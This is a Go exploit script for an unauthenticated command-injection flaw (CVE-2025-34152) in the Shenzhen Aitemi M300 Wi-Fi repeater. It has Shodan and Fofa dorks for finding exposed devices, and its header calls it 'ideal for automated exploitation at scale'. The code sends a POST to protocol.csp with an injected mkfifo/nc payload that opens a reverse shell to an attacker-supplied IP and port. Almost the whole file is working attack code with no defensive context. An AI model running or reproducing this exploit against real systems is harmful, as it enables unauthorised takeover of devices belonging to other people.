package main import ( "flag" "fmt" "io" "net/http" "net/url" "os" "strings" ) /* Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE (CVE-2025-34152) - does not require authentication (even when the login panel is enabled) - does not reboot the device - does not affect network configuration - ideal for automated exploitation at scale Dorks: - Fofa: icon_hash="-741058468" && server="lighttpd/1.4.32" - Shodan: http.favicon.hash:-741058468 lighttpd/1.4.32 */ func main() { host := flag.String("u", "", "Target host URL (e.g., http://192.168.11.1)") lhost := flag.String("i", "", "Attacker IP for reverse shell") lport := flag.String("p", "", "Attacker port for reverse shell") proxyURL := flag.String("x", "", "Optional proxy URL (e.g., http://127.0.0.1:8080)") flag.Parse() if *host == "" || *lhost == "" || *lport == "" { fmt.Printf("Usage: %s -u <host_url> -i <lhost> -p <lport> [-x <proxy_url>]\n", os.Args[0]) os.Exit(1) } h := strings.TrimRight(*host, "/") endpoint := h + "/protocol.csp?" raw := fmt.Sprintf("$(mkfifo /tmp/x; nc %s %s < /tmp/x | /bin/sh > /tmp/x 2>&1)", *lhost, *lport) encoded := url.QueryEscape(raw) encoded = strings.ReplaceAll(encoded, "+", "%20") body := fmt.Sprintf("fname=system&opt=time_conf&function=set&time=%s", encoded) req, err := http.NewRequest("POST", endpoint, strings.NewReader(body)) if err != nil { fmt.Printf("[!] Request creation failed: %v\n", err) os.Exit(1) } transport := &http.Transport{} if *proxyURL != "" { parsedURL, err := url.Parse(*proxyURL) if err != nil { fmt.Printf("[!] Invalid proxy URL: %v\n", err) os.Exit(1) } transport.Proxy = http.ProxyURL(parsedURL) } client := &http.Client{Transport: transport} resp, err := client.Do(req) if err != nil { fmt.Printf("[!] Request failed: %v\n", err) os.Exit(1) } defer resp.Body.Close() fmt.Printf("[+] Response %d\n", resp.StatusCode) data, err := io.ReadAll(resp.Body) if err != nil { fmt.Printf("[!] Reading response failed: %v\n", err) os.Exit(1) } fmt.Println(string(data)) }